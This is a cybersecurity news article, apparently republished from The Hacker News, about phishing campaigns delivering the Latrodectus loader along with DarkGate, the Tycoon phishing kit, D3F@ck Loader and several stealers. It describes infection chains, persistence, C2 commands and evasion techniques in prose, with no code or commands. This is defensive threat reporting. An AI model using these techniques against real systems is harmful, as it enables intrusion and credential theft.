Spike in Phishing Campaigns Delivers Latrodectus, the Successor to IcedID
Latrodectus Emerges: The New Malware Loader Succeeding IcedID
Cybersecurity researchers have observed a spike in email phishing campaigns starting early March 2024 that deliver Latrodectus, a nascent malware loader believed to be the successor to the IcedID malware.
Recognizable Infection Chain
“These campaigns typically involve a recognizable infection chain involving oversized JavaScript files that utilize WMI’s ability to invoke msiexec.exe and install a remotely-hosted MSI file on a WEBDAV share,” Elastic Security Labs researchers Daniel Stepanic and Samir Bousseaden explained.
Latrodectus comes with standard capabilities expected of malware designed to deploy additional payloads such as QakBot, DarkGate, and PikaBot, allowing threat actors to conduct various post-exploitation activities.
Advanced Capabilities and Techniques
An analysis of the latest Latrodectus artifacts has revealed an extensive focus on enumeration and execution, as well as the incorporation of a self-delete technique to remove running files. The malware masquerades as libraries associated with legitimate software, utilizes source code obfuscation, and performs anti-analysis checks to prevent execution in debugging or sandboxed environments.
Latrodectus also establishes persistence on Windows hosts using a scheduled task and contacts a command-and-control (C2) server over HTTPS to receive commands. These commands enable it to collect system information, update, restart, and terminate itself, and run shellcode, DLL, and executable files.
See Also: So, you want to be a hacker?
Offensive Security, Bug Bounty Courses
Discover your weakest link. Be proactive, not reactive. Cybercriminals need just one flaw to strike.
New Functionalities
Two new commands added to Latrodectus since its emergence late last year include the ability to enumerate files in the desktop directory and retrieve the entire running process ancestry from the infected machine. The malware also supports a command to download and execute IcedID (command ID 18) from the C2 server, although Elastic did not detect this behavior in the wild.
“There definitely is some kind of development connection or working arrangement between IcedID and Latrodectus,” the researchers noted. “One hypothesis is that Latrodectus is being actively developed as a replacement for IcedID, and the handler (#18) was included until malware authors were satisfied with Latrodectus’ capabilities.”
Broader Cyber Threat Landscape
The development comes as Forcepoint dissected a phishing campaign using invoice-themed email lures to deliver the DarkGate malware. The attack chain begins with phishing emails posing as QuickBooks invoices, urging users to install Java by clicking on an embedded link that leads to a malicious Java archive (JAR). This JAR file acts as a conduit to run a PowerShell script responsible for downloading and launching DarkGate via an AutoIT script.
Social engineering campaigns have also employed an updated version of a phishing-as-a-service (PhaaS) platform called Tycoon to harvest Microsoft 365 and Gmail session cookies and bypass multi-factor authentication (MFA) protections.
“This new version boasts enhanced detection evasion capabilities that make it even harder for security systems to identify and block the kit,” Proofpoint said. Significant alterations to the kit’s JavaScript and HTML code have been implemented to increase its stealthiness and effectiveness. These include obfuscation techniques to make the source code harder to understand and the use of dynamic code generation to tweak the code every time it runs, thus evading signature-based detection systems.
Trending: 10 Misconceptions about Hacking
Trending: Digital Forensics Tool: dnstwist
Emerging Threats
Other social engineering campaigns detected in March 2024 have exploited Google ads impersonating Calendly and Rufus to propagate another malware loader known as D3F@ck Loader, which first emerged in cybercrime forums in January 2024, ultimately dropping Raccoon Stealer and DanaBot.
“The case of D3F@ck Loader illustrates how malware-as-a-service (MaaS) continues to evolve, utilizing Extended Validation certificates to bypass trusted security measures,” cybersecurity company eSentire noted late last month.
New Malware Families
The disclosure also follows the emergence of new stealer malware families like Fletchen Stealer, WaveStealer, zEus Stealer, and Ziraat Stealer. Meanwhile, the Remcos remote access trojan (RAT) has been spotted using a PrivateLoader module to augment its capabilities.
“By installing VB scripts, altering the registry, and setting up services to restart the malware at variable times or by control, Remcos malware is able to infiltrate a system completely and remain undetected,” the SonicWall Capture Labs threat research team said.
Are u a security researcher? Or a company that writes articles about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing? If you want to express your idea in an article contact us here for a quote: [email protected]
Source: thehackernews.com
Recent News
Offensive Security & Ethical Hacking Course
Begin the learning curve of hacking now!
Information Security Solutions
Find out how Pentesting Services can help you.
